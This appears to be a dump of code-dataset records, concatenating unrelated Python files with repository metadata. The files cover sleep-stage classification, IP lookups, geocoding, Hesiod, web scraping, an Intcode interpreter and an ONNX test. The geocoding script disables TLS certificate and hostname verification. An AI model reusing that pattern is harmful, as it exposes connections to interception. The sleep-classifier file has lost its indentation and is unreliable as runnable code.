] | 7 | 2019-02-23T17:57:25.000Z | 2021-03-19T13:32:28.000Z | Sleep_stage_classifier/score_newpatient.py | bdh-team-12/sleep-predictions-through-deep-learning | 7664cdffc0a0b0e732bffc95fd01e3ea27687025 | [
"MIT"
] | 7 | 2019-03-02T16:55:57.000Z | 2019-04-27T20:11:12.000Z | Sleep_stage_classifier/score_newpatient.py | bdh-team-12/sleep-predictions-through-deep-learning | 7664cdffc0a0b0e732bffc95fd01e3ea27687025 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sun Apr 21 23:01:59 2019
@author: CRNZ
"""
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 21 21:24:21 2019
@author: CRNZ
"""
import numpy as np
import pandas as pd
import scipy.signal as ssignal
import os
import matplotlib.pyplot as plt
"""this is from Blake's code"""
import sys
sys.path.append("..")
import shhs.polysomnography.polysomnography_reader as pr
import mne
from mne.datasets.sleep_physionet.age import fetch_data
from mne.time_frequency import psd_array_welch
from utils import *
from sklearn.preprocessing import FunctionTransformer
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import *
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import pickle
def preparedata(filename):
raw = mne.io.read_raw_edf(filename)
a=int(len(raw)/3750)
b=np.zeros(a)
c=b+1
d=np.linspace(0,a*3750,a,endpoint=False,dtype=int)
e=np.vstack((d,b,c)).T.astype(int)
event_id = {'Sleep stage W': 1}
epochs = pr.sleep_stage_epochs(raw=raw, events=e, event_id=event_id).load_data()
x_train=eeg_power_band_shhs(epochs)
x_train2=add_pre_post(x_train)
return x_train2
'''read data'''
filename = 'D:/Documents/GaTech/CSE 6250 Big data for Health/Term project/Ruby for download/shhs/polysomnography/edfs/shhs1/shhs1-200006.edf'
PATH_TRAIN_FILE = "./output"
PATH_MODEL = "./model/"
Score_output="./score_result"
os.makedirs(Score_output, exist_ok=True)
X_train=np.load(os.path.join(PATH_TRAIN_FILE, 'X_train.npy'))
X_score=preparedata(filename)
'''standardize based on X_train'''
scaler=StandardScaler()
scaler.fit(X_train)
X_score=scaler.transform(X_score)
np.save(os.path.join(PATH_TRAIN_FILE, 'X_score.npy'), X_score)
X_score=np.load(os.path.join(PATH_TRAIN_FILE, 'X_score.npy'))
save_file = 'RFC.sav'
RFC = pickle.load(open(os.path.join(PATH_MODEL, save_file), 'rb'))
YP_test=RFC.predict(X_score)
score_result = 'score.csv'
output_file = open(os.path.join(Score_output, score_result), 'w')
output_file.write("stages\n")
for y in YP_test:
output_file.write("{}\n".format(y))
output_file.close() | 28.385542 | 142 | 0.720289 | 365 | 2,356 | 4.476712 | 0.424658 | 0.029376 | 0.0306 | 0.058752 | 0.094247 | 0.094247 | 0.094247 | 0.094247 | 0.0612 | 0 | 0 | 0.025628 | 0.155348 | 2,356 | 83 | 143 | 28.385542 | 0.795477 | 0.040323 | 0 | 0 | 0 | 0.018868 | 0.116576 | 0.039351 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018868 | false | 0 | 0.358491 | 0 | 0.396226 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5c8f7ac03387dbc75bca001d6ea7901ce4e37956 | 2,705 | py | Python | ipregistry/request.py | sebspion/ipregistry-python | 5d71e3fcf785a5be99d004ef96ced976c57dd60a | [
"Apache-2.0"
] | 7 | 2019-07-28T08:29:54.000Z | 2021-08-06T10:42:31.000Z | ipregistry/request.py | sebspion/ipregistry-python | 5d71e3fcf785a5be99d004ef96ced976c57dd60a | [
"Apache-2.0"
] | 15 | 2020-07-05T15:22:58.000Z | 2022-01-10T17:01:20.000Z | ipregistry/request.py | sebspion/ipregistry-python | 5d71e3fcf785a5be99d004ef96ced976c57dd60a | [
"Apache-2.0"
] | 3 | 2020-01-06T13:43:41.000Z | 2020-09-25T11:59:04.000Z | """
Copyright 2019 Ipregistry (https://ipregistry.co).
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import abc
import json
import requests
import six
import sys
from six.moves.urllib.parse import quote
from .__init__ import __version__
from .model import ApiError, ClientError, IpInfo
@six.add_metaclass(abc.ABCMeta)
class IpregistryRequestHandler:
def __init__(self, config):
self._config = config
@abc.abstractmethod
def batchLookup(self, ips, options):
pass
@abc.abstractmethod
def originLookup(self, options):
pass
@abc.abstractmethod
def singleLookup(self, ip, options):
pass
def _buildApiUrl(self, ip, options):
result = self._config.apiUrl + "/" + ip + "?key=" + self._config.apiKey
for key, value in options.items():
if isinstance(value, bool):
value = 'true' if value is True else 'false'
result += "&" + key + "=" + quote(value)
return result
class DefaultRequestHandler(IpregistryRequestHandler):
def batchLookup(self, ips, options):
try:
r = requests.post(self._buildApiUrl('', options), data=json.dumps(ips), headers=self._headers(), timeout=self._config.timeout)
r.raise_for_status()
return list(map(lambda data: LookupError(data) if 'code' in data else IpInfo(data), r.json()['results']))
except requests.HTTPError:
raise ApiError(r.json())
except Exception as e:
raise ClientError(e)
def originLookup(self, options):
return self.singleLookup('', options)
def singleLookup(self, ip, options):
try:
r = requests.get(self._buildApiUrl(ip, options), headers=self._headers(), timeout=self._config.timeout)
r.raise_for_status()
return IpInfo(r.json())
except requests.HTTPError:
raise ApiError(r.json())
except Exception as e:
raise ClientError(e)
def _headers(self):
return {
"content-type": "application/json",
"user-agent": "Ipregistry/Python" + str(sys.version_info[0]) + "/" + __version__
}
| 31.823529 | 138 | 0.648799 | 323 | 2,705 | 5.331269 | 0.424149 | 0.034843 | 0.034843 | 0.018583 | 0.260163 | 0.164925 | 0.164925 | 0.164925 | 0.164925 | 0.164925 | 0 | 0.004442 | 0.251017 | 2,705 | 84 | 139 | 32.202381 | 0.845508 | 0.212569 | 0 | 0.444444 | 0 | 0 | 0.040346 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.055556 | 0.148148 | 0.037037 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
5ca55240c2125f62a6b90ba9a21b1bb79de7d0a8 | 605 | py | Python | reverse_api_call.py | ericpanyc/INFO550_Project | 92b91537e94dc859931eef3f5f7b29795dcbb87c | [
"MIT"
] | null | null | null | reverse_api_call.py | ericpanyc/INFO550_Project | 92b91537e94dc859931eef3f5f7b29795dcbb87c | [
"MIT"
] | null | null | null | reverse_api_call.py | ericpanyc/INFO550_Project | 92b91537e94dc859931eef3f5f7b29795dcbb87c | [
"MIT"
] | null | null | null | import requests
import xml.etree.ElementTree as ET
import urllib.request, urllib.parse, urllib.error
import json
import ssl
import sys
import re
import getopt
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
lon = str(37.7812808)
lat = str(-122.4152363)
url = "https://nominatim.openstreetmap.org/reverse?format=geojson&lat=lat_hold&lon=lon_hold"
url = url.replace("lat_hold", lat)
url = url.replace("lon_hold", lon)
uh = urllib.request.urlopen(url, context=ctx)
data = uh.read()
js = json.loads(data)
print(json.dumps(js, indent = 4, sort_keys = True))
| 23.269231 | 92 | 0.757025 | 97 | 605 | 4.618557 | 0.587629 | 0.058036 | 0.058036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037313 | 0.11405 | 605 | 25 | 93 | 24.2 | 0.798507 | 0 | 0 | 0 | 0 | 0.05 | 0.165289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5cb3d1baec8827e58e067298c08cef15ddaef136 | 3,903 | py | Python | hesiod.py | ebroder/python-hesiod | 2b11f727fe934efe8935ac3543fe538d14b8fafe | [
"MIT"
] | 3 | 2015-11-23T10:57:33.000Z | 2017-01-12T19:38:11.000Z | hesiod.py | ebroder/python-hesiod | 2b11f727fe934efe8935ac3543fe538d14b8fafe | [
"MIT"
] | 1 | 2019-12-12T18:38:26.000Z | 2019-12-13T01:28:26.000Z | hesiod.py | ebroder/python-hesiod | 2b11f727fe934efe8935ac3543fe538d14b8fafe | [
"MIT"
] | 1 | 2019-12-10T00:50:36.000Z | 2019-12-10T00:50:36.000Z | """
Present both functional and object-oriented interfaces for executing
lookups in Hesiod, Project Athena's service name resolution protocol.
"""
from _hesiod import bind, resolve
from pwd import struct_passwd
from grp import struct_group
class HesiodParseError(Exception):
pass
class Lookup(object):
"""
A Generic Hesiod lookup
"""
def __init__(self, hes_name, hes_type):
self.results = resolve(hes_name, hes_type)
self.parseRecords()
def parseRecords(self):
pass
class FilsysLookup(Lookup):
def __init__(self, name):
Lookup.__init__(self, name, 'filsys')
def parseRecords(self):
Lookup.parseRecords(self)
self.filsys = []
self.multiRecords = (len(self.results) > 1)
for result in self.results:
priority = 0
if self.multiRecords:
result, priority = result.rsplit(" ", 1)
priority = int(priority)
parts = result.split(" ")
type = parts[0]
if type == 'AFS':
self.filsys.append(dict(type=type,
location=parts[1],
mode=parts[2],
mountpoint=parts[3],
priority=priority))
elif type == 'NFS':
self.filsys.append(dict(type=type,
remote_location=parts[1],
server=parts[2],
mode=parts[3],
mountpoint=parts[4],
priority=priority))
elif type == 'ERR':
self.filsys.append(dict(type=type,
message=parts[1],
priority=priority))
elif type == 'UFS':
self.filsys.append(dict(type=type,
device=parts[1],
mode=parts[2],
mountpoint=parts[3],
priority=priority))
elif type == 'LOC':
self.filsys.append(dict(type=type,
location=parts[1],
mode=parts[2],
mountpoint=parts[3],
priority=priority))
else:
raise HesiodParseError('Unknown filsys type: %s' % type)
self.filsys.sort(key=(lambda x: x['priority']))
class PasswdLookup(Lookup):
def __init__(self, name):
Lookup.__init__(self, name, 'passwd')
def parseRecords(self):
passwd_info = self.results[0].split(':')
passwd_info[2] = int(passwd_info[2])
passwd_info[3] = int(passwd_info[3])
self.passwd = struct_passwd(passwd_info)
class UidLookup(PasswdLookup):
def __init__(self, uid):
Lookup.__init__(self, uid, 'uid')
class GroupLookup(Lookup):
def __init__(self, group):
Lookup.__init__(self, group, 'group')
def parseRecords(self):
group_info = self.results[0].split(':')
group_info[2] = int(group_info[2])
members = group_info[3]
if members != '':
members = members.split(',')
else:
members = []
group_info[3] = members
self.group = struct_group(group_info)
class GidLookup(GroupLookup):
def __init__(self, gid):
Lookup.__init__(self, gid, 'gid')
__all__ = ['bind', 'resolve',
'Lookup', 'FilsysLookup', 'PasswdLookup', 'UidLookup',
'GroupLookup', 'GidLookup',
'HesiodParseError']
| 33.93913 | 72 | 0.478606 | 353 | 3,903 | 5.093484 | 0.252125 | 0.048943 | 0.036707 | 0.055617 | 0.262514 | 0.219132 | 0.172414 | 0.172414 | 0.172414 | 0.129032 | 0 | 0.012324 | 0.417884 | 3,903 | 114 | 73 | 34.236842 | 0.779049 | 0.041507 | 0 | 0.318182 | 0 | 0 | 0.043034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113636 | false | 0.125 | 0.034091 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
5cb8bdd032359f6049176403be6a28a63908a5f4 | 3,488 | py | Python | Doulist-book-Spider/spider.py | bujige/Python-practice | c1eb76b0caaada628f23a477303f07d6be3f707c | [
"Apache-2.0"
] | null | null | null | Doulist-book-Spider/spider.py | bujige/Python-practice | c1eb76b0caaada628f23a477303f07d6be3f707c | [
"Apache-2.0"
] | null | null | null | Doulist-book-Spider/spider.py | bujige/Python-practice | c1eb76b0caaada628f23a477303f07d6be3f707c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
#-*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf8')
from bs4 import BeautifulSoup
import re
import urllib2
import xlwt
#得到页面全部内容
def askURL(url):
request = urllib2.Request(url)#发送请求
try:
response = urllib2.urlopen(request)#取得响应
html= response.read()#获取网页内容
#print html
except urllib2.URLError, e:
if hasattr(e,"code"):
print e.code
if hasattr(e,"reason"):
print e.reason
return html
#获取相关内容
def getData(baseurl):
findLink=re.compile(r'<a href="(.*?)">')#找到影片详情链接
findImgSrc=re.compile(r'<img.*src="(.*jpg)"',re.S)#找到影片图片
findTitle=re.compile(r'<span class="title">(.*)</span>')#找到片名
#找到评分
findRating=re.compile(r'<span class="rating_num" property="v:average">(.*)</span>')
#找到评价人数
findJudge=re.compile(r'<span>(\d*)人评价</span>')
#找到概况
findInq=re.compile(r'<span class="inq">(.*)</span>')
#找到影片相关内容:导演,主演,年份,地区,类别
findBd=re.compile(r'<p class="">(.*?)</p>',re.S)
#去掉无关内容
remove=re.compile(r' |\n|</br>|\.*')
datalist=[]
for i in range(0,10):
url=baseurl+str(i*25)
html=askURL(url)
soup = BeautifulSoup(html)
for item in soup.find_all('div',class_='item'):#找到每一个影片项
data=[]
item=str(item)#转换成字符串
#print item
link=re.findall(findLink,item)[0]
data.append(link)#添加详情链接
imgSrc=re.findall(findImgSrc,item)[0]
data.append(imgSrc)#添加图片链接
titles=re.findall(findTitle,item)
#片名可能只有一个中文名,没有外国名
if(len(titles)==2):
ctitle=titles[0]
data.append(ctitle)#添加中文片名
otitle=titles[1].replace(" / ","")#去掉无关符号
data.append(otitle)#添加外国片名
else:
data.append(titles[0])#添加中文片名
data.append(' ')#留空
rating=re.findall(findRating,item)[0]
data.append(rating)#添加评分
judgeNum=re.findall(findJudge,item)[0]
data.append(judgeNum)#添加评论人数
inq=re.findall(findInq,item)
#可能没有概况
if len(inq)!=0:
inq=inq[0].replace("。","")#去掉句号
data.append(inq)#添加概况
else:
data.append(' ')#留空
bd=re.findall(findBd,item)[0]
bd=re.sub(remove,"",bd)
bd=re.sub('<br>'," ",bd)#去掉<br>
bd=re.sub('/'," ",bd)#替换/
#data.append(bd)
words=bd.split(" ")
for s in words:
if len(s)!=0 and s!=' ':#去掉空白内容
data.append(s)
#主演有可能因为导演内容太长而没有
if(len(data)!=12):
data.insert(8,' ')#留空
datalist.append(data)
return datalist
#将相关数据写入excel中
def saveData(datalist,savepath):
book=xlwt.Workbook(encoding='utf-8',style_compression=0)
sheet=book.add_sheet('豆瓣电影Top250',cell_overwrite_ok=True)
col=('电影详情链接','图片链接','影片中文名','影片外国名',
'评分','评价数','概况','导演','主演','年份','地区','类别')
for i in range(0,12):
sheet.write(0,i,col[i])#列名
for i in range(0,250):
data=datalist[i]
for j in range(0,12):
sheet.write(i+1,j,data[j])#数据
book.save(savepath)#保存
def main():
baseurl='https://movie.douban.com/top250?start='
datalist=getData(baseurl)
savapath=u'豆瓣电影Top250.xlsx'
saveData(datalist,savapath)
main() | 32 | 87 | 0.537844 | 434 | 3,488 | 4.306452 | 0.412442 | 0.064205 | 0.042804 | 0.029963 | 0.077582 | 0.021402 | 0 | 0 | 0 | 0 | 0 | 0.020235 | 0.291571 | 3,488 | 109 | 88 | 32 | 0.736139 | 0.088303 | 0 | 0.045455 | 0 | 0 | 0.12014 | 0.032186 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.056818 | null | null | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cc027723f5b3b780d5950c42ab9f7f49e9095b9 | 899 | py | Python | objets/rectangles.py | houahidi/exos-python | 60055ff2933a07876213aa8e5f03c9388f628b99 | [
"Apache-2.0"
] | null | null | null | objets/rectangles.py | houahidi/exos-python | 60055ff2933a07876213aa8e5f03c9388f628b99 | [
"Apache-2.0"
] | null | null | null | objets/rectangles.py | houahidi/exos-python | 60055ff2933a07876213aa8e5f03c9388f628b99 | [
"Apache-2.0"
] | null | null | null | """ Gestion des rectangles"""
from objets import points as p
from objets.formes import Forme
class Rectangle(Forme):
""" Rectangle avec 2D"""
def __init__(self, origine, longueur=0, largeur=0):
Forme.__init__(self,origine)
self.longueur = longueur
self.largeur = largeur
def __str__(self):
""" afficher le rectangle"""
return "Rectangle(rayon : {0}, largeur:{1}) \n \t".format(self.longueur, self.largeur) \
+ Forme.__str__(self)
def perimetre(self):
"calculer le perimetre"
return 2 * (self.longueur + self.largeur)
def surface(self):
"calculer la surface"
return self.longueur * self.largeur
if __name__ == "__main__":
ORIGINE = p.Point(2, 5)
RECT1 = Rectangle(ORIGINE, 3, 5)
print RECT1
print "Surface : ", RECT1.surface()
print "Perimetre : ", RECT1.perimetre()
| 29 | 96 | 0.621802 | 106 | 899 | 5.04717 | 0.415094 | 0.08972 | 0.142056 | 0.128972 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020833 | 0.252503 | 899 | 30 | 97 | 29.966667 | 0.775298 | 0 | 0 | 0 | 0 | 0 | 0.135863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.090909 | null | null | 0.136364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cc481688e70e209f8ed80b1bc42132901de5460 | 1,893 | py | Python | rackspaceauth/loading/v2.py | serzh/rackspace-keystoneauth-plugin | 5c51d7f1a9b15dfd6a683e948853401896e78bb7 | [
"Apache-2.0"
] | 1 | 2017-04-26T04:45:45.000Z | 2017-04-26T04:45:45.000Z | rackspaceauth/loading/v2.py | serzh/rackspace-keystoneauth-plugin | 5c51d7f1a9b15dfd6a683e948853401896e78bb7 | [
"Apache-2.0"
] | 6 | 2016-01-12T18:35:12.000Z | 2017-05-31T13:51:41.000Z | rackspaceauth/loading/v2.py | serzh/rackspace-keystoneauth-plugin | 5c51d7f1a9b15dfd6a683e948853401896e78bb7 | [
"Apache-2.0"
] | 4 | 2016-01-11T23:53:57.000Z | 2020-10-28T13:23:56.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneauth1 import loading
from rackspaceauth import v2
class APIKey(loading.BaseV2Loader):
@property
def plugin_class(self):
return v2.APIKey
def get_options(self):
options = super(APIKey, self).get_options()
options.extend([
loading.Opt('username',
help='Username'),
loading.Opt('api-key',
dest='api_key',
help='API Key'),
])
return options
class Password(loading.BaseV2Loader):
@property
def plugin_class(self):
return v2.Password
def get_options(self):
options = super(Password, self).get_options()
options.extend([
loading.Opt('username',
help='Username'),
loading.Opt('password',
help='Password'),
])
return options
class Token(loading.BaseV2Loader):
@property
def plugin_class(self):
return v2.Token
def get_options(self):
options = super(Token, self).get_options()
options.extend([
loading.Opt('tenant-id',
dest='tenant_id',
help='Tenant ID'),
loading.Opt('token',
help='Token'),
])
return options
| 27.042857 | 75 | 0.587427 | 212 | 1,893 | 5.193396 | 0.410377 | 0.054496 | 0.073569 | 0.081744 | 0.378747 | 0.378747 | 0.299728 | 0.266122 | 0.266122 | 0.121708 | 0 | 0.00931 | 0.31907 | 1,893 | 69 | 76 | 27.434783 | 0.844841 | 0.275753 | 0 | 0.511628 | 0 | 0 | 0.077999 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139535 | false | 0.116279 | 0.046512 | 0.069767 | 0.395349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
5ccc43f2af35e3202201e7a59cefaf44ae5c6723 | 5,080 | py | Python | 2019/day9.py | ellull/codeofadvent2017 | 6e6530dd179dab1bef35e1ba94c1f86f990af4ae | [
"Unlicense"
] | null | null | null | 2019/day9.py | ellull/codeofadvent2017 | 6e6530dd179dab1bef35e1ba94c1f86f990af4ae | [
"Unlicense"
] | 4 | 2021-03-18T20:13:06.000Z | 2022-03-11T23:12:20.000Z | 2019/day9.py | ellull/adventofcode | 6e6530dd179dab1bef35e1ba94c1f86f990af4ae | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
import fileinput
from collections import defaultdict
from threading import Thread
from queue import Queue
class Memory(defaultdict):
def __init__(self, content):
super(Memory, self).__init__(int, enumerate(content))
def __getitem__(self, address):
if address < 0:
raise KeyError("address must be greather than or equal to 0")
return super(Memory, self).__getitem__(address)
def __setitem__(self, address, value):
if address < 0:
raise KeyError("address must be greather than or equal to 0")
return super(Memory, self).__setitem__(address, value)
class Intcode(Thread):
def __init__(self, program, input_queue = None, output_queue = None):
super(Intcode, self).__init__()
self.ic = 0
self.relative_base = 0
self.memory = Memory(program)
self.input_queue = input_queue if input_queue is not None else Queue()
self.output_queue = output_queue if output_queue is not None else Queue()
def _fetch_instruction(self):
opcode = self.memory[self.ic]
return (opcode % 100, opcode // 100)
def _fetch_params_addresses(self, num_params, params_mode):
params_addresses = []
modes = [int(mode) for mode in "{:03d}".format(params_mode)]
for i in range(num_params):
mode = modes.pop()
param_address = self.ic + i + 1
if mode == 0:
param_address = self.memory[param_address]
if mode == 2:
param_address = self.memory[param_address] + self.relative_base
params_addresses.append(param_address)
return self.ic + num_params + 1, tuple(params_addresses)
def run(self):
while True:
instruction, params_mode = self._fetch_instruction()
if instruction == 1:
next_ic, params_addresses = self._fetch_params_addresses(3, params_mode)
self.memory[params_addresses[2]] = self.memory[params_addresses[0]] + self.memory[params_addresses[1]]
elif instruction == 2:
next_ic, params_addresses = self._fetch_params_addresses(3, params_mode)
self.memory[params_addresses[2]] = self.memory[params_addresses[0]] * self.memory[params_addresses[1]]
elif instruction == 3:
next_ic, params_addresses = self._fetch_params_addresses(1, params_mode)
self.memory[params_addresses[0]] = self.input_queue.get()
elif instruction == 4:
next_ic, params_addresses = self._fetch_params_addresses(1, params_mode)
self.output_queue.put(self.memory[params_addresses[0]])
elif instruction == 5:
next_ic, params_addresses = self._fetch_params_addresses(2, params_mode)
if self.memory[params_addresses[0]]:
next_ic = self.memory[params_addresses[1]]
elif instruction == 6:
next_ic, params_addresses = self._fetch_params_addresses(2, params_mode)
if not self.memory[params_addresses[0]]:
next_ic = self.memory[params_addresses[1]]
elif instruction == 7:
next_ic, params_addresses = self._fetch_params_addresses(3, params_mode)
self.memory[params_addresses[-1]] = 1 if self.memory[params_addresses[0]] < self.memory[params_addresses[1]] else 0
elif instruction == 8:
next_ic, params_addresses = self._fetch_params_addresses(3, params_mode)
self.memory[params_addresses[-1]] = 1 if self.memory[params_addresses[0]] == self.memory[params_addresses[1]] else 0
elif instruction == 9:
next_ic, params_addresses = self._fetch_params_addresses(1, params_mode)
self.relative_base += self.memory[params_addresses[0]]
elif instruction == 99:
break
self.ic = next_ic
return self
computer = Intcode([109, 1, 204, -1, 1001, 100, 1, 100, 1008, 100, 16, 101, 1006, 101, 0, 99]).run()
assert list(computer.output_queue.queue) == [109, 1, 204, -1, 1001, 100, 1, 100, 1008, 100, 16, 101, 1006, 101, 0, 99]
computer = Intcode([1102, 34915192, 34915192, 7, 4, 7, 99, 0]).run()
assert len(str(computer.output_queue.get())) == 16
computer = Intcode([104, 1125899906842624, 99]).run()
assert computer.output_queue.get() == 1125899906842624
class SingleQueue(object):
def __init__(self, value):
self._value = value
self._used = False
def get(self):
if self._used:
raise Exception
self._used = True
return self._value
if __name__ == "__main__":
program = [int(value) for value in fileinput.input().readline().split(",")]
print("BOOST keycode = {:d}".format(Intcode(program, SingleQueue(1)).run().output_queue.get()))
print("Coordinates = {:d}".format(Intcode(program, SingleQueue(2)).run().output_queue.get()))
| 44.955752 | 132 | 0.625 | 626 | 5,080 | 4.808307 | 0.183706 | 0.204319 | 0.100997 | 0.157807 | 0.524917 | 0.503654 | 0.457143 | 0.4299 | 0.4299 | 0.4299 | 0 | 0.056614 | 0.266339 | 5,080 | 112 | 133 | 45.357143 | 0.751006 | 0.004134 | 0 | 0.16129 | 0 | 0 | 0.027481 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 1 | 0.096774 | false | 0 | 0.043011 | 0 | 0.236559 | 0.021505 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5ccc7127c44d4142b170576b830eded68fe36b7d | 1,495 | py | Python | test/runtime/frontend_test/onnx_test/defs_test/nn_test/average_pool_test.py | steerapi/webdnn | 1df51cc094e5a528cfd3452c264905708eadb491 | [
"MIT"
] | 1 | 2021-04-09T15:55:35.000Z | 2021-04-09T15:55:35.000Z | test/runtime/frontend_test/onnx_test/defs_test/nn_test/average_pool_test.py | steerapi/webdnn | 1df51cc094e5a528cfd3452c264905708eadb491 | [
"MIT"
] | null | null | null | test/runtime/frontend_test/onnx_test/defs_test/nn_test/average_pool_test.py | steerapi/webdnn | 1df51cc094e5a528cfd3452c264905708eadb491 | [
"MIT"
] | null | null | null | import chainer
import numpy as np
from test.runtime.frontend_test.onnx_test.util import make_node, make_tensor_value_info, make_model
from test.util import wrap_template, generate_kernel_test_case
from webdnn.frontend.onnx import ONNXConverter
@wrap_template
def template(N=2, H=5, W=5, C=7, KH=3, KW=3, SH=1, SW=1, PH=1, PW=1, DH=1, DW=1, description: str = ""):
if DH != 1 or DW != 1:
raise NotImplementedError
x_shape = [N, C, H, W]
vx = np.random.rand(*x_shape)
vy = chainer.functions.average_pooling_2d(vx, ksize=[KH, KW], stride=[SH, SW], pad=[PH, PW]).data
x = make_tensor_value_info("x", x_shape)
y = make_tensor_value_info("y", vy.shape)
kwargs = {
"kernel_shape": [KH, KW],
"strides": [SH, SW],
"dilations": [DH, DW],
"pads": [PH, PH, PW, PW]
}
operator = make_node("AveragePool", ["x"], ["y"], **kwargs)
model = make_model([operator], [x], [y])
graph = ONNXConverter().convert(model)
generate_kernel_test_case(
description=f"[ONNX] AveragePool {description}",
graph=graph,
inputs={graph.inputs[0]: vx},
expected={graph.outputs[0]: vy},
)
def test():
template()
def test_projection():
template(KH=1, KW=1, SH=1, SW=1, PH=0, PW=0)
def test_global_pool():
template(KH=5, KW=5, SH=1, SW=1, PH=0, PW=0)
def test_odd_k():
template(KH=3, KW=5)
def test_odd_s():
template(SH=1, SW=2)
def test_odd_p():
template(PH=0, PW=0)
| 23.730159 | 104 | 0.621405 | 239 | 1,495 | 3.728033 | 0.34728 | 0.047138 | 0.022447 | 0.063973 | 0.051627 | 0.042649 | 0.042649 | 0.042649 | 0.042649 | 0.042649 | 0 | 0.029711 | 0.21204 | 1,495 | 62 | 105 | 24.112903 | 0.726655 | 0 | 0 | 0 | 1 | 0 | 0.052843 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170732 | false | 0 | 0.121951 | 0 | 0.292683 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cd33629275ce906ddd9c7290b07ab76b7a71763 | 262 | py | Python | Ex0014/ex0014.py | Rodrigo-Antonio-Silva/ExerciciosPythonCursoemVideo | 3b2d68094dd5d60f0e45a75590eb2be9be030640 | [
"MIT"
] | null | null | null | Ex0014/ex0014.py | Rodrigo-Antonio-Silva/ExerciciosPythonCursoemVideo | 3b2d68094dd5d60f0e45a75590eb2be9be030640 | [
"MIT"
